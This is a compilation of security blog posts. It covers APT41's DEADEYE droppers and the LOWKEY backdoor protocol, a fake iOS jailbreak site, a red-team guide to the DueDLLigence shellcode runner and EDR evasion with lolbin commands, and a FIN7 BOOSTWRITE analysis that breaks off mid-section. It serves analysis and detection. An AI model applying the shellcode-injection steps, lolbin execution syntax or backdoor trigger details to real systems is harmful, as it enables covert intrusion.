With this knowledge we decided to take a reference implementation of RC5 and add a main function that accounts for the key derivation algorithm used by the malware samples (see Figure 5). Brute forcing is possible as the key is derived from a single DWORD; even though the final key length might be 28 bytes, there are only 4294967296 possible keys. The code shown in Figure 5 generates all possible volume serial numbers, derives the key from them and tries to decrypt 51 36 94 A4 26 5B 0F 19 to 00 00 00 00 00 00 00 00. Running the RC5 brute forcer for a couple of minutes shows the correct volume serial number for the sample, which is 0xc25cff4c.

Note if you want to run the brute forcer yourself
The number of DWORDs of the key in the reference implementation we used is represented by the global c, and we had to change it to 7 to match the malware’s key length of 28 bytes. There were some issues with the conversion because in the malware a zero byte within the generated key ultimately leads to a shorter key length. The implementation we used uses a hard-coded key length (c), so we generated multiple executables with c = 6, c = 5, c = 4… as these usually only ran for a couple of minutes to cover the entire key space. All the samples mentioned in the Appendix 1 could be solved with c = 7 or c = 6.


Figure 5: Main function RC5 brute forcer

The decrypted payload belongs to the malware family POISONPLUG (MD5: 84b69b5d14ba5c5c9258370c9505438f). POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded command and control commands.

We confirmed the findings from Kaspersky and additionally found a second command and control URL hxxps://steamcommunity[.]com/id/oswal053, as mentioned in our APT 41 report.

Taking everything into account that we learned from DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), we decided to take another look at the encrypted mui file (e58d4072c56a5dd3cc5cf768b8f37e5e). Attempts to brute force the first bytes to match with the ones of the decrypted POISONPLUG payload did not yield any results.

Fortunately, we found additional samples that use the same encryption scheme. In one of the samples the malware authors included two checks to validate the decrypted payload. The expected plaintext at the specified offsets for DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff) is shown in Table 2.

Offset

Expected byte after decryption

0

0x48

1

0x8B

0x3C0

0x48

0x3C1

0x83

Table 2: Byte comparisons after decrypting in DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)

Applying these constraints to our brute forcer and trying to decrypt mui file (e58d4072c56a5dd3cc5cf768b8f37e5e) once more resulted in a low number of successful hits which we could then manually check. The correct volume serial number for the encrypted mui is 0x243e2562. Analysis determined the decrypted file is XMRig miner. This also explains why the dropper downloads two files. The first, <MODULE_NAME>.mui is the crypto miner, and the second C:\Windows\System32\wcnapi.mui, is the configuration. The decrypted mui contains another layer of obfuscation and is eventually executed with the command x -c wcnapi.mui. An explanation on how the command was obtained and the additional layer of obfuscation is given in the next part of the blog post.

For a list of samples with the corresponding volume serial numbers, please refer to Appendix 1.

Additional RC4 Layer

An additional RC4 layer has been identified in droppers used by APT41, which we internally track as DEADEYE. The layer has been previously detailed in a blog post by ESET. We wanted to provide some additional information on this, as it was used in some of the samples we managed to brute force.

The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis.

As mentioned in the blog post by ESET, the encrypted payload is prepended with a header. It contains the RC4 encryption key and two fields of variable length, which have previously been identified as file names. These two fields are encrypted with the same RC4 encryption key that is also used to decrypt the payload. The header is shown in Table 3.

Header bytes

Meaning

0 15

RC4 key XOR encoded with 0x37

16 19

Size of loader stub before the header

20 23

RC4 key size

24 27

Command ASCII size (CAS)

28 31

Command UNICODE size (CUS)

32 35

Size of encrypted payload

36 39

Launch type

40 (40 + CAS)

Command ASCII

(40 + CAS) (40 + CAS + CUS)

Command UNICODE

(40 + CAS + CUS) (40 + CAS + CUS + size of encrypted payload)

Encrypted payload

Table 3: RC4 header overview

Looking at the payloads hidden behind the RC5 layer, we observed, that these fields are not limited to file names, instead they can also contain commands used by the reflective loader. If no command is specified, the default parameter is the file name of the loaded payload. In some instances, this revealed the full file path and file name in the development environment. Table 4 shows some paths and file names. This is also how we found the command (x -c wcnapi.mui) used to launch the decrypted mui file from the first part of the blog post.

MD5 hash

Arguments found in the RC4 layer

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\Inner-Loader\x64\Release\Inner-Loader.dll

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

UserFunction.dll

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

ProcTran.dll

c11dd805de683822bf4922aecb9bfef5

E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll

c11dd805de683822bf4922aecb9bfef5

UserFunction.dll

c11dd805de683822bf4922aecb9bfef5

ProcTran.dll

Table 4: Decrypted paths and file names

LOWKEY

The final part of the blog post describes the capabilities of the passive backdoor LOWKEY (MD5: 8aab5e2834feb68bb645e0bad4fa10bd) decrypted from DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff). LOWKEY is a passive backdoor that supports commands for a reverse shell, uploading and downloading files, listing and killing processes and file management. We have identified two variants of the LOWKEY backdoor.

The first is a TCP variant that listens on port 53, and the second is an HTTP variant that listens on TCP port 80. The HTTP variant intercepts URL requests matching the UrlPrefix http://+:80/requested.html. The + in the given UrlPrefix means that it will match any host name. It has been briefly mentioned by Kaspersky as “unknown backdoor”.

Both variants are loaded by the reflective loader described in the previous part of the blog post. This means we were able to extract the original file names. They contain meaningful names and provide a first hint on how the backdoor operates.

HTTP variant (MD5: c11dd805de683822bf4922aecb9bfef5)
E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll

TCP variant (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)
E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe

The interesting parts are shown in Figure 6. PortReuse describes the general idea behind the backdoor, to operate on a well-known port. The paths also contain version numbers 2.5 and v1.3-53. IIS_Share is used for the HTTP variant and describes the targeted application, DeviceIOContrl-Hook is used for the TCP variant.


Figure 6: Overview important parts of executable path

Both LOWKEY variants are functionally identical with one exception. The TCP variant relies on a second component, a user mode rootkit that is capable of intercepting incoming TCP connections. The internal name used by the developers for that component is E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe.


Figure 7: LOWKEY components

Inner-Loader.dll

Inner-Loader.dll is a watch guard for the LOWKEY backdoor. It leverages the GetExtendedTcpTable API to retrieve all processes with an open TCP connection. If a process is listening on TCP port 53 it injects NetAgent.exe into the process. This is done in a loop with a 10 second delay. The loader exits the loop when NetAgent.exe has been successfully injected. After the injection it will create a new thread for the LOWKEY backdoor (SK3.x.exe).

The watch guard enters an endless loop that executes every 20 minutes and ensures that the NetAgent.exe and the LOWKEY backdoor are still active. If this is not the case it will relaunch the backdoor or reinject the NetAgent.exe.

NetAgent.exe

NetAgent.exe is a user mode rootkit that provides covert communication with the LOWKEY backdoor component. It forwards incoming packets, after receiving the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00, to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}.

The component works by hooking the NtDeviceIoControlFile API. It does that by allocating a suspiciously large region of memory, which is used as a global hook table. The table consists of 0x668A0 bytes and has read, write and execute permissions set.

Each hook table entry consists of 3 pointers. The first points to memory containing the original 11 bytes of each hooked function, the second entry contains a pointer to the remaining original instructions and the third pointer points to the function hook. The malware will only hook one function in this manner and therefore allocates an unnecessary large amount of memory. The malware was designed to hook up to 10000 functions this way.

The hook function begins by iterating the global hook table and compares the pointer to the hook function to itself. This is done to find the original instructions for the installed hook, in this case NtDeviceIoControlFile. The malware then executes the saved instructions which results in a regular NtDeviceIoControlFile API call. Afterwards the IoControlCode is compared to 0x12017 (AFD_RECV).

If the IoControlCode does not match, the original API call results are returned.

If they match the malware compares the first 12 bytes of the incoming data. As it is effectively a TCP packet, it is parsing the TCP header to get the data of the packet. The first 12 bytes of the data section are compared against the hard-coded byte pattern: FF FF 01 00 00 01 00 00 00 00 00 00.

If they match it expects to receive additional data, which seems to be unused, and then responds with a 16 byte header 00 00 00 00 00 91 03 00 00 00 00 00 80 1F 00 00, which seems to be hard-coded and to indicate that following packets will be forwarded to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}. The backdoor component (SK3.x.exe) receives and sends data to the named pipe. The hook function will forward all received data from the named pipe back to the socket, effectively allowing a covert communication between the named pipe and the socket.

SK3.x.exe

SK3.x.exe is the actual backdoor component. It supports writing and reading files, modification of file properties, an interactive command shell, TCP relay functionality and listing running processes. The backdoor opens a named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} for communication.

Data received by the backdoor is encrypted with RC4 using the key “CreateThread“ and then XORed with 0x77. All data sent by the backdoor uses the same encryption in reverse order (first XOR with 0x77, then RC4 encrypted with the key “CreateThread“). Encrypted data is preceded by a 16-byte header which is unencrypted containing an identifier and the size of the following encrypted packet.

An example header looks as follows:
00 00 00 00 00 FD 00 00 10 00 00 00 00 00 00 00

Bytes

Meaning

00 00 00 00 00

unknown

FD 00

Bytes 5 and 6 are the command identifier, for a list of all supported identifiers check Table 6 and Table 7.

00

unknown

10 00 00 00

Size of the encrypted packet that is send after the header

00 00 00 00

unknown

Table 5: Subcomponents of header

The backdoor supports the commands listed in tables Table 6 and Table 7. Most commands expect a string at the beginning which likely describes the command and is for the convenience of the operators, but this string isn't actively used by the malware and could be anything. For example, KILL <PID> could also be A <PID>. Some of the commands rely on two payloads (UserFunction.dll and ProcTran.dll), that are embedded in the backdoor and are either injected into another process or launch another process.

UserFunction.dll

Userfunction.dll starts a hidden cmd.exe process, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} and forwards all received data from the pipe to the standard input of the cmd.exe process. All output from the process is redirected back to the named pipe. This allows interaction with the shell over the named pipe.

ProcTran.dll

The component opens a TCP connection to the provided host and port, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} and forwards all received data from the pipe to the opened TCP connection. All received packets on the connection are forwarded to the named pipe. This allows interaction with the TCP connection over the named pipe.

Identifier

Arguments

Description

0xC8

<cmd> <arg1> <arg2>

Provides a simple shell, that supports the following commands, dir, copy, move, del, systeminfo and cd. These match the functionality of standard commands from a shell. This is the only case where the <cmd> is actually used.

0xC9

<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects UserFunction.dll into the process, which is an interactive shell that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00000}. The backdoor will then forward incoming data to the named pipe allowing for communication with the opened shell. If no PID is provided, the `cmd.exe` is launched as child process of the backdoor process with input and output redirected to the named pipe Microsoft Ole Object {30000-7100-12985-00001-00001}

0xCA

<cmd> <arg1> <arg2>

Writes data to a file. The first argument is the <file_name>, the second argument is an offset into the file

0xCB

<cmd> <arg1> <arg2>
<arg3>

Reads data from a file. The first argument is the <file_name>, the second argument is an offset into the file, the third argument is optional, and the exact purpose is unknown

0xFA

-

Lists running processes, including the process name, PID, process owner and the executable path

0xFB

<cmd> <arg1>

Kills the process with the provided process id (PID)

0xFC

<cmd> <arg1> <arg2>

Copies the files CreationTime, LastAccessTime and LastWriteTime from the second argument and applies them to the first argument. Both arguments are expected to be full file paths. The order of the arguments is a bit unusual, as one would usually apply the access times from the second argument to the third

0xFD

-

List running processes with additional details like the SessonId and the CommandLine by executing the WMI query SELECT Name,ProcessId,SessionId,CommandLine,ExecutablePath FROM Win32_Process

0xFE

-

Ping command, the malware responds with the following byte sequence 00 00 00 00 00 65 00 00 00 00 00 00 06 00 00 00. Experiments with the backdoor revealed that the identifier 0x65 seems to indicate a successful operation, whereas 0x66 indicates an error.

Table 6: C2 commands

The commands listed in Table 7 are used to provide functionality of a TCP traffic relay. This allows operators to communicate through the backdoor with another host via TCP. This could be used for lateral movement in a network. For example, one instance of the backdoor could be used as a jump host and additional hosts in the target network could be reached via the TCP traffic relay. Note that the commands 0xD2, 0xD3 and 0xD6 listed in Table 7 can be used in the main backdoor thread, without having to use the ProcTran.dll.

Identifier

Arguments

Description

0x105

<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects ProcTran.dll into the process, which is a TCP traffic relay component that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00001}. The commands 0xD2, 0xD3 and 0xD6 can then be used with the component.

0xD2

<arg1> <arg2>

Opens a connection to the provided host and port, the first argument is the host, the second the port. On success a header with the identifier set to 0xD4 is returned (00 00 00 00 00 D4 00 00 00 00 00 00 00 00 00 00). This effectively establishes a TCP traffic relay allowing operators to communicate with another system through the backdoored machine.

0xD3

<arg1>

Receives and sends data over the connection opened by the 0xD2 command. Received data is first RC4 decrypted with the key “CreateThread“ and then single-byte XOR decoded with 0x77. Data sent back is directly relayed without any additional encryption.

0xD6

-

Closes the socket connection that had been established by the 0xD2 command

0xCF

-

Closes the named pipe Microsoft Ole Object {30000-7100-12985-00000-00001} that is used to communicate with the injected ProcTran.dll. This seems to terminate the thread in the targeted process by the 0x105 command

Table 7: C2 commands TCP relay

Summary

The TCP LOWKEY variant passively listens for the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00 on TCP port 53 to be activated. The backdoor then uses up to three named pipes for communication. One pipe is used for the main communication of the backdoor, the other ones are used on demand for the embedded payloads.

  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} main communication pipe
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} named pipe used for interaction with the TCP relay module ProcTran.dll
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} named pipe used for the interactive shell module UserFunction.dll

Figure 8 summarizes how the LOWKEY components interact with each other.


Figure 8: LOWKEY passive backdoor overview

Appendix

MD5 HASH

Correct Volume Serial

Dropper Family

Final Payload Family

2b9244c526e2c2b6d40e79a8c3edb93c

0xde82ce06

DEADEYE.APPEND

POISONPLUG

04be89ff5d217796bc68678d2508a0d7

0x56a80cc8

DEADEYE.APPEND

POISONPLUG

092ae9ce61f6575344c424967bd79437

0x58b5ef5c

DEADEYE.APPEND

LOWKEY.HTTP

37e100dd8b2ad8b301b130c2bca3f1ea

0xc25cff4c

DEADEYE.APPEND

POISONPLUG

39fe65a46c03b930ccf0d552ed3c17b1

0x24773b24

DEADEYE.APPEND

POISONPLUG

5322816c2567198ad3dfc53d99567d6e

-

DEADEYE.DOWN

-

557ff68798c71652db8a85596a4bab72

0x4cebb6e9

DEADEYE.APPEND

POISONPLUG

64e09cf2894d6e5ac50207edff787ed7

0x64fd8753

DEADEYE.APPEND

POISONPLUG

650a3dce1380f9194361e0c7be9ffb97

0xeaa61f82

DEADEYE.APPEND

POISONPLUG

7dc6bbc202e039dd989e1e2a93d2ec2d

0xa8c5a006

DEADEYE.APPEND

LOWKEY

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

0x9438158b

DEADEYE.APPEND

LOWKEY

904bbe5ac0d53e74a6cefb14ebd58c0b

0xde82ce06

DEADEYE.APPEND

POISONPLUG

c11dd805de683822bf4922aecb9bfef5

0xcab011e1

DEADEYE.APPEND

LOWKEY.HTTP

d49c186b1bfd7c9233e5815c2572eb98

0x4a23bd79

DEADEYE.APPEND

LOWKEY

e58d4072c56a5dd3cc5cf768b8f37e5e

0x243e2562

None - encrypted data

XMRIG

eb37c75369046fb1076450b3c34fb8ab

0x00e5a39e

DEADEYE.APPEND

LOWKEY

ee5b707249c562dc916b125e32950c8d

0xdecb3d5d

DEADEYE.APPEND

POISONPLUG

ff8d92dfbcda572ef97c142017eec658

0xde82ce06

DEADEYE.APPEND

POISONPLUG

ffd0f34739c1568797891b9961111464

0xde82ce06

DEADEYE.APPEND

POISONPLUG

Appendix 1: List of samples with RC5 encrypted payloads

Checkrain fake iOS jailbreak leads to click fraud

Attackers are capitalizing on the recent discovery of a new vulnerability that exists across legacy iOS hardware. Cisco Talos recently discovered a malicious actor using a fake website that claims to give iPhone users the ability to jailbreak their phones. However, this site just prompts users to download a malicious profile which allows the attacker to conduct click-fraud.

Checkm8 is a vulnerability in the bootrom of some legacy iOS devices that allows users to control the boot process. The vulnerability impacts all legacy models of the iPhone from the 4S through the X. The campaign we’ll cover in this post tries to capitalize off of checkra1n, a project that uses the checkm8 vulnerability to modify the bootrom and load a jailbroken image onto the iPhone. Checkm8 can be exploited with an open-source tool called “ipwndfu” developed by Axi0mX.

The attackers we’re tracking run a malicious website called checkrain[.]com that aims to draw in users who are looking for checkra1n.

This discovery made headlines and caught the attention of many security researchers. Jailbreaking a mobile device can be attractive to researchers, average users and malicious actors. A researcher or user may want to jailbreak phones to bypass standard restrictions put in place by the manufacturer to download additional software onto the device or look deeper into the inner workings of the phone. However, an attacker could jailbreak a device for malicious purposes, eventually obtaining full control of the device.

 

Read More >>>

Threat Roundup for October 4 to October 11

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 4 and Oct 11. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10112019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Staying Hidden on the Endpoint: Evading Detection with Shellcode

True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response (EDR) products have matured over the years, the red teams must follow suit. This blog post will provide some insights into how the FireEye Mandiant Red Team crafts payloads to bypass modern EDR products and get full command and control (C2) on their victims’ systems.

Shellcode injection or its execution is our favorite method for launching our C2 payload on a victim system; but what is shellcode? Michael Sikorski defines shellcode as a “…term commonly used to describe any piece of self-contained executable code” (Practical Malware Analysis). Most commercial Penetration Testing Frameworks such as Empire, Cobalt Strike, or Metasploit have a shellcode generator built into the tool. The shellcode generator is generally in either a binary format or hex format depending on whether you generate it as raw output or as an application source.

Why do we use shellcode for all our payloads?

The use of shellcode in our red team assessment payloads allows us to be incredibly flexible in the type of payload we use. Shellcode runners can be in written in a wide range of programming languages that can be incorporated into many types of payloads. This flexibility allows us to customize our payloads to support the specific needs of our clients and of any given situation that may arise during a red team assessment. Since shellcode can be launched from inside a payload or injected into an already running process, we can use several techniques to increase the ability of our payloads to evade detection from EDR products depending on the scenario and technology in place in the target environment. Several techniques exist for obfuscating shellcode, such as encryption and custom encoding, that make it difficult for EDR products to detect shellcode from commercial C2 tools on its own. The flexibility and evasive properties of shellcode are the primary reason that we rely heavily on shellcode based payloads during red team assessments.

Shellcode Injection Vs. Execution

One of the most crucial parts of any red team assessment is developing a payload that will successfully, reliably, and stealthily run on the target system. Payloads can either execute shellcode from within its own process or inject shellcode into the address space of another process that will ultimately execute the shellcode. For the purposes of this blog post we’ll refer to shellcode injection as shellcode executed inside a remote process and shellcode execution as shellcode executed inside the payload process.

Shellcode injection is one technique that red teams and malicious attackers use to avoid detection from EDR products and network defenders. Additionally, many EDR products implement detections based on expected behavior of windows processes. For example, an attacker that executes Mimikatz from the context of an arbitrary process, let’s say DefinitelyNotEvil.exe, may get detected or blocked outright because the EDR tool does not expect that process to access lsass.exe. However, by injecting into a windows process, such as svchost.exe, that regularly touches lsass.exe, it may be possible to bypass these detections because the EDR product sees this as an expected behavior.

In this blog post, we’ll cover three different techniques for running shellcode.

  • CreateThread
  • CreateRemoteThread
  • QueueUserAPC

Each of these techniques corresponds to a Windows API function that is responsible for the allocation of a thread to the shellcode, ultimately resulting in the shellcode being run. CreateThread is a technique used for shellcode execution while CreateRemoteThread and QueueUserAPC are forms of shellcode injection.

The following is a high-level outline of the process for running shellcode with each of the three different techniques.

CreateThread
  1. Allocate memory in the current process
  2. Copy shellcode into the allocated memory
  3. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  4. Create a thread with the base address of the allocated memory segment
  5. Wait on the thread handle to return
CreateRemoteThread
  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate executable memory within the target process
  4. Write shellcode into the allocated memory
  5. Create a thread in the remote process with the start address of the allocated memory segment


Figure 1: Windows API calls for CreateRemoteThread injection

QueueUserAPC
  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate memory within the target process
  4. Write shellcode into the allocated memory
  5. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  6. Open a thread in the remote process with the start address of the allocated memory segment
  7. Submit thread to queue for execution when it enters an “alertable” state
  8. Resume thread to enter “alertable” state


Figure 2: Windows API calls for QueueUserAPC injection

Command Execution

Let’s break down what we’ve talked about so far:

  • Malicious code is your shellcode – the stage 0 or stage 1 code that is truly going to do the malicious work.
  • Standard “shellcode runner” application which executes your code via either injection or execution. Most everyone writes their own shellcode runner, so we don’t necessarily deem this as true malware, the real malware is the shellcode itself.

Now that we’ve covered all that, we need a method to execute the code you compiled. Generally, this is either an executable (EXE) or a Dynamic Link Library (DLL). The Red Team prefers using Living Off the Land Binaries (lolbins) commands which will execute our compiled code.

The reason we can take advantage of lolbins is because of unmanaged exports. At a high level, when an executable calls a DLL it is looking for a specific export within the DLL to execute the code within that export. If the export is not properly protected, then you can craft your own DLL with the export name you know the executable is looking for and run your arbitrary code; which in this case will be your shellcode runner.

Putting It All Together

We set out to develop a shellcode runner DLL that takes advantage of lolbins through unmanaged exports while also providing the flexibility to execute both injected and non-injected shellcode without a need to update the code base. This effort resulted in a C# shellcode runner called DueDLLigence, for which the source code can be found at the GitHub page.

The DueDLLigence project provides a quick and easy way to switch between different shellcode techniques described previously in this blog post by simply switching out the value of the global variable shown in Figure 3.


Figure 3: Shellcode technique variable

The DueDLLigence DLL contains three unmanaged exports inside of it. These exports can be used with the Rasautou, Control, and Coregen native Windows commands as described in Figure 4. Note: The shellcode that is in the example will only pop calc.

Native Windows Executable

Required Export Name

Syntax Used To Run

Rasautou

Powershell

rasautou –d {full path to dll} –p powershell –a a –e e

Control

Cplapplet

Rename compiled “dll” extension to “cpl” and just double click it!

MSIExec

Dllunregisterserver

msiexec /z {full path to dll}

Figure 4: DueDLLigence execution outline

When you open the source code you will find the example uses the exports shown in Figure 5.


Figure 5: Source code for exported entry points

The first thing you should do is generate your own shellcode. An example of this is shown in Figure 6, where we use Cobalt Strike to generate raw shellcode for the “rev_dns” listener. Once that is complete, we run the base64 -w0 payload.bin > [outputFileName] command in Linux to generate the base64 encoded version of the shellcode as shown in Figure 7.


Figure 6: Shellcode generation


Figure 7: Converting shellcode to base64

Then you simply replace the base64 encoded shellcode on line 58 with the base64'd version of your own x86 or x64 shellcode. The screenshot in Figure 6 generated an x86 payload, you will need to check the “use x64 payload” box to generate an x64 payload.

At this point you should reinstall the Unmanaged exports library in the DueDLLigence Visual Studio project because sometimes when you’re using a different project it doesn’t work properly. You can reinstall opening the NuGet package manager console shown in Figure 8 and running the Install-Package UnmanagedExports -Version 1.2.7 command.


Figure 8: Open NuGet Package Manager

After you have reinstalled the Unmanaged exports library and replaced the base64 encoded shellcode on line 58 then you are ready to compile! Go ahead and build the source and look for your DLL in the bin folder. We strongly suggest that you test your DLL to ensure it has the proper exports associate with it. Visual Studio Pro comes with the Dumpbin.exe utility which you can run against your DLL to view the exports as shown in Figure 9.


Figure 9: Dumpbin.exe output

You can expand the list as much as you want with more lolbin techniques found over at the GitHub page.

We prefer to remove the unmanaged exports that are not going to be used with the respective payload that was generated so there is a smaller footprint in the payload. In general, this is good tradecraft when crafting payloads or writing code. In our industry we have the principle of least privilege, well this is the principle of least code!

Modern Detections for Shellcode Injection

Despite all the evasive advantages that shellcode offers, there is hope when it comes to detecting shellcode injection. We looked at several different methods for process injection.

In our shellcode runner, the shellcode injection techniques (CreateRemoteThread and QueueUserAPC) spawn a process in a suspended state and then inject shellcode into the running process. Let’s say we choose the process to inject into as explorer.exe and our payload will run with MSIExec. This will create a process tree where cmd.exe will spawn msiexec.exe which will in turn spawn explorer.exe.


Figure 10: Process tree analysis

In an enterprise environment it is possible to collect telemetry data with a SIEM to determine how often, across all endpoints, the cmd.exe -> msiexec.exe -> explorer.exe process tree occurs. Using parent-child process relationships, defenders can identify potential malware through anomaly detection.

API hooking is commonly used by EDR and AV products to monitor and for detect the use of Windows API calls that are commonly used by malware authors. Utilizing kernel routines such as PsSetCreateProcessNotifyRoutine(Ex) and PsSetCreateThreadNotifyRoutine(Ex), security software can monitor when certain API calls are used, such as CreateRemoteThread. Combining this information with other data such as process reputation and enterprise-wide telemetry can be used to provide high fidelity alerts for potential malware.

When process injection occurs, one process modifies the memory protections of a memory region in another process’s address space. By detecting the use of API calls such as VirtualProtectEx that result in one process modifying the memory protections of address space allowed to another process, especially when the PAGE_EXECUTE_READWRITE permissions are used as this permission is used to allow the shellcode to be written and executed within the same memory space.

As red teamers and malicious actors continue to develop new process injection techniques, network defenders and security software continue to adapt to the ever-changing landscape. Monitoring Windows API function calls such as VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, and NTQueueAPCThread can provide valuable data for identifying potential malware. Monitoring for the use of CreateProcess with the CREATE_SUSPENDED and CREATE_HIDDEN flags may assist in detecting process injection where the attacker creates a suspended and hidden process to inject into.

As we’ve seen, process injection techniques tend to follow a consistent order in which they call Windows API functions. For example, both injection techniques call VirtualAllocEx followed by WriteProcessMemory and identifying when a process calls these two APIs in that order can be used as a basis for detecting process injection.

Conclusion

Using shellcode as the final stage for payloads during assessments allows Red Teams the flexibility to execute payloads in a wide array of environments while implementing techniques to avoid detection. The DueDLLigence shellcode runner is a dynamic tool that takes advantage of the evasive properties of both shellcode and process injection to offer Red Teams a way to avoid detection. Detections for the execution of LOLbins on the command line and process injection at the API and process level should be incorporated into defensive methodology, as attackers are increasingly being forced into living off the land with the increased adoption of application whitelisting.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Loading...
Starting...
Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

